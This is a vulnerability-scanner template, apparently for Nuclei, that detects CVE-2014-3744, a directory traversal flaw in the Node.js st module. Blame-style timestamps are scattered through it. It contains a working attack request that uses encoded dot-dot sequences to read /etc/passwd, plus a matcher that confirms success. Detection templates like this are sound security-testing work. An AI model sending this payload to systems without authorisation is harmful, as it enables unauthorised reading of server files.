2021-05-17 13:18:10 +00:00
id : CVE-2014-3744
info :
name : Node.js st module Directory Traversal
author : geeknik
2022-04-22 10:38:41 +00:00
severity : high
2022-02-25 14:32:23 +00:00
description : A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
2021-08-18 11:37:49 +00:00
reference :
2022-02-25 14:32:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
2021-05-17 14:02:49 +00:00
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
2021-05-17 13:18:10 +00:00
- https://snyk.io/vuln/npm:st:20140206
2022-05-17 09:18:12 +00:00
- https://nodesecurity.io/advisories/st_directory_traversal
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2014-3744
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2014,lfi,nodejs,st
2021-05-17 13:18:10 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2022-02-25 14:32:23 +00:00
# Enhanced by mp on 2022/02/24